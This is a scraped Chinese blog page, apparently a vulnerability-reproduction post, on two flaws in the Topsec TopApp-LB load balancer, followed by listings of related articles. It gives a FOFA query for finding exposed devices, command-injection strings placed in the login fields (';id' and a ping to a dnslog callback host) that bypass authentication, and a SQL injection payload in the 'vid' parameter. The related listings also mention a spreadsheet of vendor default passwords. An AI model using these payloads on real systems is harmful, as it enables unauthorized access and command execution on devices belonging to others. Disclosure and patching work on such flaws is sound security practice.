天融信TopApp-LB 负载均衡系统

最新推荐文章于 2024-02-29 08:56:26 发布

原创

最新推荐文章于 2024-02-29 08:56:26 发布 · 2.5k 阅读

0 ·

CC 4.0 BY-SA版权

本文披露了天融信TopApp-LB系统的两个严重安全问题：任意用户登录漏洞，允许攻击者无需密码直接登录；以及SQL注入漏洞，通过特定参数实现。

fofa："TopApp-LB"

在这里插入图片描述

1.任意用户登录

①用户名随意密码：;id（天融信负载均衡TopApp-LB系统无需密码直接登录）
②用户名: ; ping 9928e5.dnslog.info; echo 密码：随意
在这里插入图片描述
登录成功

2.sql注入漏洞

注入点vid

t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@..

在这里插入图片描述

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Min1996

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

天融信负载均衡TopApp-LB命令执行

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

06-27

440

时光静悄悄地流逝。世界上有些人因为忙而感到生活的沉重，而有些人因为闲而活得压抑。

天融信负载均衡TopApp-LB任意登陆

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

06-28

524

青年，青年！无论受怎样的挫折和打击，都要咬着牙关挺住，因为你们完全有机会重建生活；只要不灰心丧气，每一次挫折就只不过是通往新境界的一块普通绊脚石，而绝不会置人于死命。

参与评论您还未登录，请先登录后发表或查看评论

天融信TopApp NLB链路负载配置指导文档v2.doc

11-13

天融信 TopApp负载均衡系统的配置指导文档，从初始化开始详细指导了配置过程，建议大家下载使用。天融信负载均衡系统（以下简称TopApp产品）为客户提供高可靠的数据中心解决方案，包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。系统集成了压缩、缓存、SSL卸载等网络优化技术，加速业务系统提升系统效率。同时结合Web应用防火墙、DNS防火墙、DDoS攻击防护及漏洞扫描功能形成全方位的网络安全防护，为客户业务系统安全保驾护航。

天融信负载均衡配置手册

04-25

天融信负载均衡配置手册

天融信TOPApp-LB负载均衡-2020HW

战神/calmness的博客

09-25

2383

目录描述概述影响漏洞利用过程前台绕过注入修复建议 天融信TOPApp-LB负载均衡SQL注入描述 天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞，具体为在可以访问管理服务情况下，攻击者通过构造恶意请求，利用系统检查输入条件不严格的缺陷，进一步可获取部分系统本地信息。概述 天融信负载均衡系统（以下简称TopApp产品）是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度，TopApp-LB负载均

2021Kfzz1#wiki#天融信负载均衡TopApp-LB任意登陆1

07-25

天融信负载均衡TopApp-LB任意登陆漏洞描述天融信负载均衡TopApp-LB系统无需密码可直接登陆，查看敏感信息影响版本天融信负载均衡TopApp-LB漏洞

天融信负载均衡 TopAPP-LB SQL 注入

m0_48520508的博客

09-23

961

网络安全检测与防护技术国家地方联合工程研究中心 1、负载均衡系统概述 天融信负载均衡系统（以下简称TopApp产品）是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度，TopApp-LB负载均衡系统让大规模的应用部署轻松实现，同时达至最稳定的运行效果，最高的资源利用率，最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署，满足了信息化发展的需求，并极大地提升了工作效率。 天融信负载均衡设备图：应用场景图： 2、漏洞

网络负载均衡

#维多利亚的秘密#

08-05

2562

负载均衡是由多台服务器以对称的方式组成一个服务器集合，每台服务器都具有等价的地位，都可以单独对外提供服务而无须其他服务器的辅助。通过某种负载分担技术，将外部发送来的请求均匀分配到对称结构中的某一台服务器上，而接收到请求的服务器独立地回应客户的请求。均衡负载能够平均分配客户请求到服务器列阵，籍此提供快速获取重要数据，解决大量并发访问服务问题。目录 1定义

web访问负载均衡的实现

weixin_34320724的博客

11-08

176

主要的目的是实现负载均衡，所以采用rpm包安装,DNS也是提供最基本的正向解析。环境介绍：三台虚拟机，数据库服务器以及DNS服务器放在172.16.16.3台虚拟机上，在172.16.16.33这台虚拟机上创建论坛，172.16.16.1这台虚拟机用来挂载第二台虚拟机上的论坛。环境图示：注意：确认selinux的状态时关闭的。在虚拟机172....

天融信TopApp-LB 负载均衡系统漏洞总结

qq_17754023的博客

08-11

1065

1、天融信负载均衡TopApp-LB系统无需密码直接登陆。3、天融信TopApp-LB 负载均衡系统Sql注入漏洞。app=“天融信-TopApp-LB-负载均衡系统”2、天融信TopApp-LB负载均衡命令执行漏洞。title=“TopApp-LB 负载均衡系统”1、使用poc:：用户名随意密码：;...

天融信网闸web界面登录方式_一探究竟——天融信网闸TopRules7000

weixin_39815600的博客

11-27

5621

网闸即：安全隔离与信息交换系统，常用作企业内外网隔离与业务互访用途。相比给服务器加多块网卡跨多个网段来说，网闸提供了更加安全的方式。TR-71289-Q探究背景：某次，网闸配置新业务，重启设备查看是否生效，结果发现刚重启完设备后，软件还可以发现设备登录系统，一旦应用策略就会提示"Access violation at address 004DF29C in module 'GAP.exe'.错误"...

天融信初始账户密码 .xlsx

11-17

天融信产品存在各个设备初始账户密码均不同的情况，此表收集一些常用的账户密码仅供参考

天融信防火墙配置指南

12-07

天融信防火墙配置指南天融信防火墙配置指南

ensp 移动主机搜索不到AP信道_有颜值更有才华，乘风破浪的天融信面板AP接受硬核实测...

weixin_39552472的博客

10-27

599

前言近日，信息化观察网选择天融信面板AP——TAP-62200(H)进行评测，希望评测数据能够帮助企业用户解决无线组网问题,营造快捷高效的办公环境。外观介绍TAP-62200(H)面板 AP 实拍图(正面)TAP-62200(H)面板 AP的机身为白色，外观采用八角工业设计，体积小巧，简约时尚，堪称无线AP产品中的颜值派。设备正面配有指示灯，可以通过不同的颜色显示设备不同的工作状态。TAP-622...

天融信网闸web界面登录方式_大华录像机网络回放有哪几种方式

weixin_39641738的博客

11-24

4183

录像机网络回放我们分为三种方式，下面给大家依次介绍下。方法一 WEB访问方式WEB访问前先确保主机与电脑之间网络连通，可以利用ping ***.***.***.***(硬盘录像机IP)来检测。如果ping通了，会有ping地址的返回信息，如下图：1、打开网页浏览器，地址栏输入要登录的硬盘录像机的IP地址，在登陆界面输入设备用户与密码登陆。注意：通过在地址栏输入要登录的硬盘录像机的IP地址登入设备的...

【漏洞复现】某厂商TopApp-LB系统认证绕过漏洞